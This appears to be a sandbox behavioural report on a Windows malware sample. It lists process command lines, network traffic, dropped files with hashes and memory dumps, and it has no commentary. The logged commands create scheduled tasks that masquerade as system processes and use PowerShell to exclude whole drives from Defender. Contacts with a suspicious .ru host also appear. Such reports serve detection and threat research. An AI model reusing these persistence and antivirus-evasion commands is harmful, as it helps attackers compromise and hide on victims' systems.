schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Program Files\VideoLAN\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\PLA\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\PLA\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\PLA\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Desktop\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Desktop\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Pictures\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default\Pictures\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Pictures\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\DigitalLocker\en-US\csrss.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

"C:\Users\Default\Pictures\SppExtComObj.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51c82dce-5312-4145-b6d5-a694049ccbb8.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f35d6936-9a7b-40ae-b481-da287ac57f8b.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ce590d51-0cb2-44dc-8e65-121e8153d484.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b1b51caf-91c6-427d-8f58-c40896abb817.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\148a01bf-bd23-4ec9-9c42-b1618ecd5007.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b9a4a5f5-fdf8-4559-9eec-5e6486109140.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f723110b-7234-47ef-b0d7-4c1089c6d9e6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\581ecb92-2e02-4227-9946-640cf5abbdda.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f0827014-d545-4ea1-992f-a56136e1993a.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e015ce3-3a8c-425b-8ed2-2c03355d1220.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\915bf969-118f-4c69-8afe-3197b5e00399.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\522ae4ed-5c83-4f59-9ee4-6403a0ba39a3.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b30bde46-d5ef-418f-a407-7c23f7b37c4b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a2830e49-12ac-4424-90ed-7bc3465784b7.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpAD14.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ac4265a-98b4-465f-bddb-9022819b87ab.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3f65f74e-89d7-41f6-b872-7425e9339386.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpDDA9.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5939dafa-4376-45fd-8605-9d7a42c6d1ef.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b53c5c15-b968-40d4-b516-d2fed4f1fa3e.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpF39.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b7ba8ec-503f-4cc4-932f-b7e84e7daf00.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\47e3612d-9b29-40ca-97cf-8241ef7509e7.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2BD9.tmp.exe"

C:\Users\Default\Pictures\SppExtComObj.exe

C:\Users\Default\Pictures\SppExtComObj.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 200.186.67.172.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp

Files

memory/4384-0-0x00007FFC14420000-0x00007FFC14775000-memory.dmp

memory/4384-1-0x0000000000760000-0x0000000000C54000-memory.dmp

memory/4384-2-0x00007FFC14420000-0x00007FFC14775000-memory.dmp

memory/4384-3-0x000000001BBA0000-0x000000001BCCE000-memory.dmp

memory/4384-4-0x0000000002E70000-0x0000000002E8C000-memory.dmp

memory/4384-5-0x000000001BA10000-0x000000001BA60000-memory.dmp

memory/4384-6-0x0000000002D00000-0x0000000002D08000-memory.dmp

memory/4384-7-0x0000000002E90000-0x0000000002EA0000-memory.dmp

memory/4384-8-0x000000001B9C0000-0x000000001B9D6000-memory.dmp

memory/4384-9-0x000000001B9E0000-0x000000001B9F0000-memory.dmp

memory/4384-10-0x000000001B9F0000-0x000000001B9FA000-memory.dmp

memory/4384-11-0x000000001BA00000-0x000000001BA12000-memory.dmp

memory/4384-12-0x000000001C700000-0x000000001CC28000-memory.dmp

memory/4384-15-0x000000001C1D0000-0x000000001C1DE000-memory.dmp

memory/4384-14-0x000000001BB80000-0x000000001BB8E000-memory.dmp

memory/4384-13-0x000000001BB70000-0x000000001BB7A000-memory.dmp

memory/4384-16-0x000000001C1E0000-0x000000001C1E8000-memory.dmp

memory/4384-18-0x000000001C300000-0x000000001C30C000-memory.dmp

memory/4384-17-0x000000001C1F0000-0x000000001C1F8000-memory.dmp

C:\Recovery\WindowsRE\sppsvc.exe

MD5 362ac52b63b9f6608733e6da0f41b8a0
SHA1 4351bcc1035d37bc58f641fb58b08f80949f9129
SHA256 f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf
SHA512 8f60c2beb708deef5de53c33ee8224456ac9d9a7e3ad1eeacd786b79f2511342626910d5653b6870ea2a8c5448f6ca46ca6cfa09adb0ed1407812e7522771203

C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe

MD5 e0a68b98992c1699876f818a22b5b907
SHA1 d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA256 2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512 856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

memory/3076-71-0x0000000000400000-0x0000000000407000-memory.dmp

C:\Windows\Temp\MsEdgeCrashpad\reports\SppExtComObj.exe

MD5 b2fb4202cfe66b5b17cf8e330059bb3a
SHA1 57ba5e3b143c6bf87dd901c98f2979ec82f66289
SHA256 b722c221da13a7e7aa2136aed91ee15a70e46be244bad21029799dd2bac83586
SHA512 e801a9e4e91029b49ba4dc86b5c8d9a85d1b0abe111d3e2f1bb4b816d4ad1aeba3fa04bd4f577f1630d9c3cc2fa3d6a31ed1bd9fe24b06255418b4acb64c52ce

memory/4320-132-0x0000023BB47B0000-0x0000023BB47D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b01wmmgm.0xy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4384-223-0x00007FFC14420000-0x00007FFC14775000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/540-235-0x000000001BDB0000-0x000000001BDC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd5940f08d0be56e65e5f2aaf47c538e
SHA1 d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512 c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe.log

MD5 bbb951a34b516b66451218a3ec3b0ae1
SHA1 7393835a2476ae655916e0a9687eeaba3ee876e9
SHA256 eb70c64ae99d14ac2588b7a84854fbf3c420532d7fe4dfd49c7b5a70c869943a
SHA512 63bcbfcf8e7421c66855c487c31b2991a989bdea0c1edd4c40066b52fa3eb3d9d37db1cd21b8eb4f33dd5870cc20532c8f485eab9c0b4f6b0793a35c077f2d6f

memory/964-433-0x000000001B870000-0x000000001B882000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8220c01eca52a2bdab8e95d8485a7f97
SHA1 a9fc35edb35e1b2920b4048e4b615ffb24bd16a2
SHA256 6272b9448570434cd868d8ecd66e62446240de038974c15ef8b9ff230da1059d
SHA512 b9893184f10eeb9919a93c09513e2d778e111d04262ed3b1ae39dc8a2a77b59782e1dc6c6ea153d25ff4973c83a40fccc597f5f408e37e4349b3e897877926bb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 36c0eb4cc9fdffc5d2d368d7231ad514
SHA1 ce52fda315ce5c60a0af506f87edb0c2b3fdebcc
SHA256 f6efe796606c4be6422dfd070d8c8e1bcda5852520633e3ef071541ff29f359b
SHA512 4ad7de3b286152386c4cfecb07d004d9ee3976c4e397d6a13b1ddee6524c4cb78b1c4bc9c2f984f321082f6ed6da2a2cd93f9954fd378b46f24fbf19bd15fb54

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65a68df1062af34622552c4f644a5708
SHA1 6f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA512 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3e242d3c4b39d344f66c494424020c61
SHA1 194e596f33d54482e7880e91dc05e0d247a46399
SHA256 f688037cb0c9f9c97b3b906a6c0636c91ad1864564feb17bba4973cde361172e
SHA512 27c1cd6d72554fdce3b960458a1a6bd3f740aa7c22a313a80b043db283a224bf390648b9e59e6bdbf48020d082d728fbde569bee4ee2a610f21d659a7b3dfa02

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 be95052f298019b83e11336567f385fc
SHA1 556e6abda268afaeeec5e1ee65adc01660b70534
SHA256 ebc004fe961bed86adc4025cdbe3349699a5a1fc328cc3a37f3ff055e7e82027
SHA512 233df172f37f85d34448901057ff19f20792d6e139579a1235165d5f6056a2075c19c85bc9115a6bb74c9c949aebd7bb5391e2ae9f7b1af69e5c4aca3a48cff5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d7e01f2da5faf06203d0bdcf32f2aee
SHA1 972128bc0896422301531607773f6af989535547
SHA256 57df11f5726f22f6b65380a63c6ddeeced49bd543781cf05428932500c6e2cef
SHA512 2d446d1ed39875581a11fc433c9fd13c7b5ad4133c50f93cfc18e355339c1dd8937058864250c9e3d659049f4feb8cf8e1ce3fd90716eb5c9b8cd309b9ccc16d

C:\Users\Admin\AppData\Local\Temp\51c82dce-5312-4145-b6d5-a694049ccbb8.vbs

